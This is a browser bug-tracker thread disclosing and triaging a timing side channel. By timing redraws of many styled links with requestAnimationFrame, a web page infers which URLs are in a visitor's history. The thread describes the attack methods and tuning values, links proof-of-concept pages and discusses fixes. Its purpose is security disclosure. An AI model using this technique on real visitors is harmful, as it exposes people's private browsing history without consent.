It's possible for a web page to tell if a link is visited by detecting the redraw that occurs when the link colour changes. There are two basic methods that work: Method 1: Place a (large) number of <a> elements on the web page, all with the same href. Firefox will first draw the elements in their 'unvisited' state, and fire off an async db query to check if the href is in history. If the link is visited, the browser will redraw the elements as :visited. Method 2: Place a (large) number of <a> elements on the web page, with hrefs we know aren't visited. Then update the hrefs to point to a URL we want to check. Firefox will fire of an async db query to check if the new URL is in history. If the URL is visited the <a> elements will be redrawn as :visited. How to detect the redraw: After creating or updating the links using method 1 or 2, the web page calls requestAnimationFrame repeatedly to time how long the subsequent frames take to draw. By using a large number of links and by making the links slow to draw (e.g. by setting a large text-shadow), the redraw (if it occurs) will be delayed until 2-3 frames after the links are first drawn and will take longer than 16ms, so will be detectable. There seems to be a bit of a race condition here - if the DB query comes back before the links are drawn then they only need to be drawn once and so no redraw will occur. A PoC that uses method 1 is attached. It repeatedly cycles through a number of URLs. For each URL it draws a number of <a> elements then uses requestAnimationFrame to time the next 5 frames. Usually the first two frames are involved in rendering the links, then a redraw will occur around the 3rd or 4th frame if the link is visited. The PoC tries to detect if more than 2 frames are 'slow' and regards this as a visited link. The PoC lets you tweak some parameters - this may be necessary depending on the speed of your computer (history size may be a factor too). The following values worked for me on different machines: FF21, slower PC - Shadow: 1px 1px 50px Links: 50 Link Length: 8 FF Nightly, slower PC - Shadow: (empty) Links: 350 Link Length: 1 FF21, faster PC - Shadow: 1px 1px 50px Links: 550 Link Length: 1 FF Nightly, faster PC - Shadow: (empty) Links: 2000 Link Length: 1 Potential Fixes: Method 1 could be prevented always redrawing a link even if it's not been visited. Chrome seems to wait for the history result to come back before drawing the link, so links are never redrawn. Method 2 could be prevented by not updating a link's visited flag after it's first created, even if the href changes. Both Chrome and IE seem to do this (not sure if it's to prevent this attack)
Status: UNCONFIRMED → NEW
Ever confirmed: true
Keywords: privacy, sec-low
Attachment #764094 - Attachment mime type: text/plain → text/html
Apologies, the original PoC was broken. Correct version attached.
Attachment #764094 - Attachment is obsolete: true
I will be talking about this issue and similar ones in IE and Chrome next month at Black Hat. This is rated as low impact and I don't believe that disclosing it will put users at any significant risk. It's effectively equivalent to the CSS history sniffing attack that was present in all browsers for over 10 years, though being a timing attack it is not as speedy as the original technique and its accuracy is dependent on how much load a machine is under.
I think fixing bug 557579 would fix this.
probably time to open up this bug after paul's talk at bhat 2013
Depends on: 557579
I believe this may be related to a bug I previous reported. https://bugzilla.mozilla.org/show_bug.cgi?id=773338
Attachment #765286 - Attachment mime type: text/plain → text/html
This is a more reliable proof-of-concept for modern machines. It works mostly reliably for me on both Firefox (release and aurora) and Chrome (release and canary), on both my Mac machine and my Windows machine.
dveditz, I wonder why do you mark this as sec-low? It seems to me that, to avoid this kind of sniffing, we have added great complexity to our style computation code. Issues like this simply makes those efforts meaningless.
When this was filed we weren't returning a high resolution timer in requestAnimationFrame(), and the original PoC was slower and less reliable. Fixing bug 557579 doesn't seem like it would add a lot more complexity. Would it not be sufficient?
Keywords: sec-low → sec-moderate
(In reply to Daniel Veditz [:dveditz] from comment #8) > When this was filed we weren't returning a high resolution timer in > requestAnimationFrame(), and the original PoC was slower and less reliable. OK, that makes sense. Now it is reasonably reliable and fast. > Fixing bug 557579 doesn't seem like it would add a lot more complexity. > Would it not be sufficient? I meant, we have added a lot of complexity, and those efforts become meaningless once a new hole is found. So we should fix every new hole as soon as possible, or if we think this privacy issue is not so important, we should just remove those complexity. FWIW, conceptually, I don't think bug 557579 could fix this issue, because it seems to me if the style data is not actually changed, no repaint would be triggered. I remember dbaron mentioned during TPAC that there was a plan to only show visited state if the user has visited the url from the given origin. I believe if we do that, all similiar holes would be completely closed, and we could remove all complexities for :visited. dbaron, do we still have that plan? and is there any bug number for that?
Seconding comment #9.
(In reply to Xidorn Quan [:xidorn] UTC+10 from comment #9) > I remember dbaron mentioned during TPAC that there was a plan to only show > visited state if the user has visited the url from the given origin. I > believe if we do that, all similiar holes would be completely closed, and we > could remove all complexities for :visited. > > dbaron, do we still have that plan? and is there any bug number for that? That bug is now bug 1398414.
(In reply to Xidorn Quan [:xidorn] UTC+11 from comment #6) > Created attachment 8687620 [details] > more reliable proof-of-concept > > This is a more reliable proof-of-concept for modern machines. It works > mostly reliably for me on both Firefox (release and aurora) and Chrome > (release and canary), on both my Mac machine and my Windows machine. In Firefox 52esr this proof-of-concept returns very different test values for visited and unvisited links. In Firefox 63, the test and base values are the same in nearly every case for me. Is this due to timing-related mitigations/fixes that resolves this particular issue, or is it not running correctly? Note: I copied it my hosting to bypass the CSP here just in case: https://www.jeffersonscher.com/temp/history-sniffing.html
You need to log in before you can comment on or make changes to this bug.